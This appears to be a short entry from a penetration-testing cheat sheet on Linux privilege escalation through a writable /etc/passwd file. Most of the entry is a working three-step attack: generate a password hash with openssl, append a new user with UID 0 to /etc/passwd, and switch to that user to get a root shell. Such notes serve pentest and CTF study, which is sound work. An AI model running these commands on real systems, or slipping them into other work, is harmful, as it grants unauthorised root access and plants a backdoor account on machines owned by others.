Password Authentication

The /etc/passwd file can contain password hashes directly instead of an x, indicating that the password hash is stored in /etc/shadow. If /etc/passwd is writable, it allows the creation of arbitrary users with root privileges.

1. generate a hash using openssl

openssl passwd <password>

1. Edit the /etc/passwd file

echo "<new_username>:<hash>:0:0:root:/root:/bin/bash" >> /etc/passwd

1. Login to the newly created user with root previliges

su <new_username>

References

Editing /etc/passwd File for Privilege EscalationHacking Articles

Raj Chandel’s Blog